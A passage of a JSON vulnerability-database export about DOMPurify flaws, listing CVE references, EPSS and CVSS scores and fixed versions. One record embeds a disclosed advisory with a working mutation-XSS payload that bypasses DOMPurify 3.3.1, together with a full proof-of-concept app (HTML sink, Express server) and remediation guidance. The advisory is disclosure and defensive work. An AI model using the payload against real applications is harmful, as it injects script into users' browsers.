"0.7693", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00962", "scoring_system": "epss", "scoring_elements": "0.7701", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00962", "scoring_system": "epss", "scoring_elements": "0.77017", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-16728" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2020/10/msg00029.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.debian.org/debian-lts-announce/2020/10/msg00029.html" }, { "reference_url": "https://research.securitum.com/dompurify-bypass-using-mxss", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://research.securitum.com/dompurify-bypass-using-mxss" }, { "reference_url": "https://research.securitum.com/dompurify-bypass-using-mxss/", "reference_id": "", "reference_type": "", "scores": [], "url": "https://research.securitum.com/dompurify-bypass-using-mxss/" }, { "reference_url": "https://www.npmjs.com/advisories/1205", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.npmjs.com/advisories/1205" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16728", "reference_id": "CVE-2019-16728", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16728" }, { "reference_url": "https://github.com/advisories/GHSA-chqj-j4fh-rw7m", "reference_id": "GHSA-chqj-j4fh-rw7m", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-chqj-j4fh-rw7m" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/447288?format=api", "purl": "pkg:npm/dompurify@2.0.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-37xc-54fs-8fh6" }, { "vulnerability": "VCID-3fxk-2qcb-jfa3" }, { "vulnerability": "VCID-56ww-dvtp-8uc2" }, { "vulnerability": "VCID-77rz-yewt-77cq" }, { "vulnerability": "VCID-8tpw-rcyz-xuhu" }, { "vulnerability": "VCID-cmrb-k5pw-vffn" }, { "vulnerability": "VCID-gzpp-fw72-57hu" }, { "vulnerability": "VCID-jnpe-6ax6-zubr" }, { "vulnerability": "VCID-nz3k-udjb-3fhz" }, { "vulnerability": "VCID-wmjr-1h3n-hbhb" }, { "vulnerability": "VCID-z8n7-dz6p-zqfb" }, { "vulnerability": "VCID-zaud-3sc4-ykcg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.0.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/16899?format=api", "purl": "pkg:npm/dompurify@2.0.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-37xc-54fs-8fh6" }, { "vulnerability": "VCID-3fxk-2qcb-jfa3" }, { "vulnerability": "VCID-56ww-dvtp-8uc2" }, { "vulnerability": "VCID-77rz-yewt-77cq" }, { "vulnerability": "VCID-8tpw-rcyz-xuhu" }, { "vulnerability": "VCID-cmrb-k5pw-vffn" }, { "vulnerability": "VCID-gzpp-fw72-57hu" }, { "vulnerability": "VCID-jnpe-6ax6-zubr" }, { "vulnerability": "VCID-nz3k-udjb-3fhz" }, { "vulnerability": "VCID-wmjr-1h3n-hbhb" }, { "vulnerability": "VCID-z8n7-dz6p-zqfb" }, { "vulnerability": "VCID-zaud-3sc4-ykcg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.0.3" } ], "aliases": [ "CVE-2019-16728", "GHSA-chqj-j4fh-rw7m" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-gbb5-2vbk-suh8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/326566?format=api", "vulnerability_id": "VCID-gzpp-fw72-57hu", "summary": "", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-26870", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00417", "scoring_system": "epss", "scoring_elements": "0.62284", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00417", "scoring_system": "epss", "scoring_elements": "0.62176", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00417", "scoring_system": "epss", "scoring_elements": "0.62289", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00417", "scoring_system": "epss", "scoring_elements": "0.62278", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-26870" }, { "reference_url": "https://github.com/cure53/DOMPurify/commit/02724b8eb048dd219d6725b05c3000936f11d62d", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/cure53/DOMPurify/commit/02724b8eb048dd219d6725b05c3000936f11d62d" }, { "reference_url": "https://github.com/cure53/DOMPurify/compare/2.0.16...2.0.17", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/cure53/DOMPurify/compare/2.0.16...2.0.17" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2020/10/msg00029.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.debian.org/debian-lts-announce/2020/10/msg00029.html" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26870", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26870" }, { "reference_url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-26870", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-26870" }, { "reference_url": "https://research.securitum.com/mutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://research.securitum.com/mutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass" }, { "reference_url": "https://research.securitum.com/mutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass/", "reference_id": "", "reference_type": "", "scores": [], "url": "https://research.securitum.com/mutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass/" }, { "reference_url": "https://snyk.io/vuln/SNYK-JS-DOMPURIFY-1016634", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://snyk.io/vuln/SNYK-JS-DOMPURIFY-1016634" }, { "reference_url": "https://github.com/advisories/GHSA-63q7-h895-m982", "reference_id": "GHSA-63q7-h895-m982", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-63q7-h895-m982" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/382121?format=api", "purl": "pkg:npm/dompurify@2.0.17", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-37xc-54fs-8fh6" }, { "vulnerability": "VCID-3fxk-2qcb-jfa3" }, { "vulnerability": "VCID-56ww-dvtp-8uc2" }, { "vulnerability": "VCID-77rz-yewt-77cq" }, { "vulnerability": "VCID-8tpw-rcyz-xuhu" }, { "vulnerability": "VCID-cmrb-k5pw-vffn" }, { "vulnerability": "VCID-jnpe-6ax6-zubr" }, { "vulnerability": "VCID-wmjr-1h3n-hbhb" }, { "vulnerability": "VCID-z8n7-dz6p-zqfb" }, { "vulnerability": "VCID-zaud-3sc4-ykcg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.0.17" } ], "aliases": [ "CVE-2020-26870", "GHSA-63q7-h895-m982" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-gzpp-fw72-57hu" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360058?format=api", "vulnerability_id": "VCID-jnpe-6ax6-zubr", "summary": "DOMPurify is vulnerable to mutation-XSS via Re-Contextualization\n## Description\n\nA mutation-XSS (mXSS) condition was confirmed when sanitized HTML is reinserted into a new parsing context using `innerHTML` and special wrappers. The vulnerable wrappers confirmed in browser behavior are `script`, `xmp`, `iframe`, `noembed`, `noframes`, and `noscript`. The payload remains seemingly benign after `DOMPurify.sanitize()`, but mutates during the second parse into executable markup with an event handler, enabling JavaScript execution in the client (`alert(1)` in the PoC).\n\n\n## Vulnerability\n\nThe root cause is context switching after sanitization: sanitized output is treated as trusted and concatenated into a wrapper string (for example, `<xmp> ... </xmp>` or other special wrappers) before being reparsed by the browser. In this flow, attacker-controlled text inside an attribute (for example `</xmp>` or equivalent closing sequences for each wrapper) closes the special parsing context early and reintroduces attacker markup (`<img ... onerror=...>`) outside the original attribute context. DOMPurify sanitizes the original parse tree, but the application performs a second parse in a different context, reactivating dangerous tokens (classic mXSS pattern).\n\n## PoC\n\n1. Start the PoC app:\n```bash\nnpm install\nnpm start\n```\n\n2. Open `http://localhost:3001`.\n3. Set `Wrapper en sink` to `xmp`.\n4. Use payload:\n```html\n <img src=x alt=\"</xmp><img src=x onerror=alert('expoc')>\">\n```\n\n5. Click `Sanitize + Render`.\n6. Observe:\n- `Sanitized response` still contains the `</xmp>` sequence inside `alt`.\n- The sink reparses to include `<img src=\"x\" onerror=\"alert('expoc')\">`.\n- `alert('expoc')` is triggered.\n7. Files:\n- index.html\n\n```html\n<!doctype html>\n<html lang=\"en\">\n <head>\n <meta charset=\"utf-8\">\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n <title>expoc - DOMPurify SSR PoC</title>\n <style>\n :root {\n --bg: #f7f8fb;\n --panel: #ffffff;\n --line: #d8dce6;\n --text: #0f172a;\n --muted: #475569;\n --accent: #0ea5e9;\n }\n\n * {\n box-sizing: border-box;\n }\n\n body {\n margin: 0;\n font-family: \"SF Mono\", Menlo, Consolas, monospace;\n color: var(--text);\n background: radial-gradient(circle at 10% 0%, #e0f2fe 0%, var(--bg) 60%);\n }\n\n main {\n max-width: 980px;\n margin: 28px auto;\n padding: 0 16px 20px;\n }\n\n h1 {\n margin: 0 0 10px;\n font-size: 1.45rem;\n }\n\n p {\n margin: 0;\n color: var(--muted);\n }\n\n .grid {\n display: grid;\n gap: 14px;\n margin-top: 16px;\n }\n\n .card {\n background: var(--panel);\n border: 1px solid var(--line);\n border-radius: 12px;\n padding: 14px;\n }\n\n label {\n display: block;\n margin-bottom: 7px;\n font-size: 0.85rem;\n color: var(--muted);\n }\n\n textarea,\n input,\n select,\n button {\n width: 100%;\n border: 1px solid var(--line);\n border-radius: 8px;\n padding: 9px 10px;\n font: inherit;\n background: #fff;\n }\n\n textarea {\n min-height: 110px;\n resize: vertical;\n }\n\n .row {\n display: grid;\n grid-template-columns: 1fr 230px;\n gap: 12px;\n }\n\n button {\n cursor: pointer;\n background: var(--accent);\n color: #fff;\n border-color: #0284c7;\n }\n\n #sink {\n min-height: 90px;\n border: 1px dashed #94a3b8;\n border-radius: 8px;\n padding: 10px;\n background: #f8fafc;\n }\n\n pre {\n margin: 0;\n white-space: pre-wrap;\n word-break: break-word;\n }\n\n .note {\n margin-top: 8px;\n font-size: 0.85rem;\n }\n\n .status-grid {\n display: grid;\n grid-template-columns: repeat(auto-fit, minmax(180px, 1fr));\n gap: 8px;\n margin-top: 10px;\n }\n\n .status-item {\n border: 1px solid var(--line);\n border-radius: 8px;\n padding: 8px 10px;\n font-size: 0.85rem;\n background: #fff;\n }\n\n .status-item.vuln {\n border-color: #ef4444;\n background: #fef2f2;\n }\n\n .status-item.safe {\n border-color: #22c55e;\n background: #f0fdf4;\n }\n\n @media (max-width: 760px) {\n .row {\n grid-template-columns: 1fr;\n }\n }\n </style>\n </head>\n <body>\n <main>\n <h1>expoc - DOMPurify Server-Side PoC</h1>\n <p>\n Flujo: input -> POST /sanitize (Node + jsdom + DOMPurify) -> render vulnerable con innerHTML.\n </p>\n\n <div class=\"grid\">\n <section class=\"card\">\n <label for=\"payload\">Payload</label>\n <textarea id=\"payload\"><img src=x alt=\"</script><img src=x onerror=alert('expoc')>\"></textarea>\n <div class=\"row\" style=\"margin-top: 10px;\">\n <div>\n <label for=\"wrapper\">Wrapper en sink</label>\n <select id=\"wrapper\">\n <option value=\"div\">div</option>\n <option value=\"textarea\">textarea</option>\n <option value=\"title\">title</option>\n <option value=\"style\">style</option>\n <option value=\"script\" selected>script</option>\n <option value=\"xmp\">xmp</option>\n <option value=\"iframe\">iframe</option>\n <option value=\"noembed\">noembed</option>\n <option value=\"noframes\">noframes</option>\n <option value=\"noscript\">noscript</option>\n </select>\n </div>\n <div style=\"display:flex;align-items:end;\">\n <button id=\"run\" type=\"button\">Sanitize + Render</button>\n </div>\n </div>\n <p class=\"note\">Se usa render vulnerable: <code>sink.innerHTML = '<wrapper>' + sanitized + '</wrapper>'</code>.</p>\n <div class=\"status-grid\">\n <div class=\"status-item vuln\">script (vulnerable)</div>\n <div class=\"status-item vuln\">xmp (vulnerable)</div>\n <div class=\"status-item vuln\">iframe (vulnerable)</div>\n <div class=\"status-item vuln\">noembed (vulnerable)</div>\n <div class=\"status-item vuln\">noframes (vulnerable)</div>\n <div class=\"status-item vuln\">noscript (vulnerable)</div>\n <div class=\"status-item safe\">div (no vulnerable)</div>\n <div class=\"status-item safe\">textarea (no vulnerable)</div>\n <div class=\"status-item safe\">title (no vulnerable)</div>\n <div class=\"status-item safe\">style (no vulnerable)</div>\n </div>\n </section>\n\n <section class=\"card\">\n <label>Sanitized response</label>\n <pre id=\"sanitized\">(empty)</pre>\n </section>\n\n <section class=\"card\">\n <label>Sink</label>\n <div id=\"sink\"></div>\n </section>\n </div>\n </main>\n\n <script>\n const payload = document.getElementById('payload');\n const wrapper = document.getElementById('wrapper');\n const run = document.getElementById('run');\n const sanitizedNode = document.getElementById('sanitized');\n const sink = document.getElementById('sink');\n\n run.addEventListener('click', async () => {\n const response = await fetch('/sanitize', {\n method: 'POST',\n headers: { 'Content-Type': 'application/json' },\n body: JSON.stringify({ input: payload.value })\n });\n\n const data = await response.json();\n const sanitized = data.sanitized || '';\n const w = wrapper.value;\n\n sanitizedNode.textContent = sanitized;\n sink.innerHTML = '<' + w + '>' + sanitized + '</' + w + '>';\n });\n </script>\n </body>\n</html>\n```\n\n- server.js\n\n```js\nconst express = require('express');\nconst path = require('path');\nconst { JSDOM } = require('jsdom');\nconst createDOMPurify = require('dompurify');\n\nconst app = express();\nconst port = process.env.PORT || 3001;\n\nconst window = new JSDOM('').window;\nconst DOMPurify = createDOMPurify(window);\n\napp.use(express.json());\napp.use(express.static(path.join(__dirname, 'public')));\n\napp.get('/health', (_req, res) => {\n res.json({ ok: true, service: 'expoc' });\n});\n\napp.post('/sanitize', (req, res) => {\n const input = typeof req.body?.input === 'string' ? req.body.input : '';\n const sanitized = DOMPurify.sanitize(input);\n res.json({ sanitized });\n});\n\napp.listen(port, () => {\n console.log(`expoc running at http://localhost:${port}`);\n});\n```\n\n- package.json\n\n```json\n{\n \"name\": \"expoc\",\n \"version\": \"1.0.0\",\n \"main\": \"server.js\",\n \"scripts\": {\n \"test\": \"echo \\\"Error: no test specified\\\" && exit 1\",\n \"start\": \"node server.js\",\n \"dev\": \"node server.js\"\n },\n \"keywords\": [],\n \"author\": \"\",\n \"license\": \"ISC\",\n \"description\": \"\",\n \"dependencies\": {\n \"dompurify\": \"^3.3.1\",\n \"express\": \"^5.2.1\",\n \"jsdom\": \"^28.1.0\"\n }\n}\n```\n\n## Evidence\n\n- PoC\n\n[daft-video.webm](https://github.com/user-attachments/assets/499a593d-0241-4ab8-95a9-cf49a00bda90)\n\n- XSS triggered\n<img width=\"2746\" height=\"1588\" alt=\"daft-img\" src=\"https://github.com/user-attachments/assets/1f463c14-d5a3-4c93-94e4-12d2d02c7d15\" />\n\n## Why This Happens\nThis is a mutation-XSS pattern caused by a parse-context mismatch:\n\n- Parse 1 (sanitization phase): input is interpreted under normal HTML parsing rules.\n- Parse 2 (sink phase): sanitized output is embedded into a wrapper that changes parser state (`xmp` raw-text behavior).\n- Attacker-controlled sequence (`</xmp>`) gains structural meaning in parse 2 and alters DOM structure.\n\nSanitization is not a universal guarantee across all future parsing contexts. The sink design reintroduces risk.\n\n## Remediation Guidance\n1. Do not concatenate sanitized strings into new HTML wrappers followed by `innerHTML`.\n2. Keep the rendering context stable from sanitize to sink.\n3. Prefer DOM-safe APIs (`textContent`, `createElement`, `setAttribute`) over string-based HTML composition.\n4. If HTML insertion is required, sanitize as close as possible to final insertion context and avoid wrapper constructs with raw-text semantics (`xmp`, `script`, etc.).\n5. Add regression tests for context-switch/mXSS payloads (including `</xmp>`, `</noscript>`, similar parser-breakout markers).\n\nReported by Oscar Uribe, Security Researcher at Fluid Attacks. Camilo Vera and Cristian Vargas from the Fluid Attacks Research Team have identified a mXSS via Re-Contextualization in DomPurify 3.3.1.\n\nFollowing Fluid Attacks [Disclosure Policy](https://fluidattacks.com/advisories/policy), if this report corresponds to a vulnerability and the conditions outlined in the policy are met, this advisory will be published on the website over the next few days (the timeline may vary depending on maintainers' willingness to attend to and respond to this report) at the following URL: https://fluidattacks.com/advisories/daft\n\nAcknowledgements: [Camilo Vera](https://github.com/caverav/) and [Cristian Vargas](https://github.com/tachote).", "references": [ { "reference_url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-h8r8-wccr-v5f2", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-h8r8-wccr-v5f2" }, { "reference_url": "https://github.com/advisories/GHSA-h8r8-wccr-v5f2", "reference_id": "GHSA-h8r8-wccr-v5f2", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-h8r8-wccr-v5f2" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/40110?format=api", "purl": "pkg:npm/dompurify@3.3.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-37xc-54fs-8fh6" }, { "vulnerability": "VCID-3fxk-2qcb-jfa3" }, { "vulnerability": "VCID-8d4n-d1dh-4fe9" }, { "vulnerability": "VCID-cmrb-k5pw-vffn" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.3.2" } ], "aliases": [ "GHSA-h8r8-wccr-v5f2" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jnpe-6ax6-zubr" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/205923?format=api", "vulnerability_id": "VCID-nz3k-udjb-3fhz", "summary": "Cross-Site Scripting in dompurify", "references": [ { "reference_url": "https://github.com/cure53/DOMPurify/releases/tag/2.0.7", "reference_id": "", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/cure53/DOMPurify/releases/tag/2.0.7" }, { "reference_url": "https://www.npmjs.com/advisories/1223", "reference_id": "", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.npmjs.com/advisories/1223" }, { "reference_url": "https://github.com/advisories/GHSA-mjjq-c88q-qhr6", "reference_id": "GHSA-mjjq-c88q-qhr6", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-mjjq-c88q-qhr6" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/17520?format=api", "purl": "pkg:npm/dompurify@2.0.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-37xc-54fs-8fh6" }, { "vulnerability": "VCID-3fxk-2qcb-jfa3" }, { "vulnerability": "VCID-56ww-dvtp-8uc2" }, { "vulnerability": "VCID-77rz-yewt-77cq" }, { "vulnerability": "VCID-8tpw-rcyz-xuhu" }, { "vulnerability": "VCID-cmrb-k5pw-vffn" }, { "vulnerability": "VCID-gzpp-fw72-57hu" }, { "vulnerability": "VCID-jnpe-6ax6-zubr" }, { "vulnerability": "VCID-wmjr-1h3n-hbhb" }, { "vulnerability": "VCID-z8n7-dz6p-zqfb" }, { "vulnerability": "VCID-zaud-3sc4-ykcg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.0.7" } ], "aliases": [ "GHSA-mjjq-c88q-qhr6", "GMS-2020-711" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-nz3k-udjb-3fhz" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/56525?format=api", "vulnerability_id": "VCID-wmjr-1h3n-hbhb", "summary": "DOMPurify is a DOM-only, super-fast, uber-tolerant XSS sanitizer for HTML, MathML and SVG. DOMPurify was vulnerable to prototype pollution. This vulnerability is fixed in 2.4.2.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-48910.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-48910.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-48910", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.02592", "scoring_system": "epss", "scoring_elements": "0.85978", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.02592", "scoring_system": "epss", "scoring_elements": "0.85971", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.02592", "scoring_system": "epss", "scoring_elements": "0.85968", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.02592", "scoring_system": "epss", "scoring_elements": "0.85919", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-48910" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-48910", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-48910" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2025/02/msg00010.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.debian.org/debian-lts-announce/2025/02/msg00010.html" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-48910", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-48910" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2322949", "reference_id": "2322949", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2322949" }, { "reference_url": "https://github.com/cure53/DOMPurify/commit/d1dd0374caef2b4c56c3bd09fe1988c3479166dc", "reference_id": "d1dd0374caef2b4c56c3bd09fe1988c3479166dc", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-10-31T15:52:58Z/" } ], "url": "https://github.com/cure53/DOMPurify/commit/d1dd0374caef2b4c56c3bd09fe1988c3479166dc" }, { "reference_url": "https://github.com/advisories/GHSA-p3vf-v8qc-cwcr", "reference_id": "GHSA-p3vf-v8qc-cwcr", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-p3vf-v8qc-cwcr" }, { "reference_url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-p3vf-v8qc-cwcr", "reference_id": "GHSA-p3vf-v8qc-cwcr", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-10-31T15:52:58Z/" } ], "url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-p3vf-v8qc-cwcr" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:10186", "reference_id": "RHSA-2024:10186", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:10186" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:9583", "reference_id": "RHSA-2024:9583", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:9583" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:9620", "reference_id": "RHSA-2024:9620", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:9620" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:0079", "reference_id": "RHSA-2025:0079", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:0079" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:0082", "reference_id": "RHSA-2025:0082", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:0082" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:0654", "reference_id": "RHSA-2025:0654", "reference_type": "", "scores": [], "url": 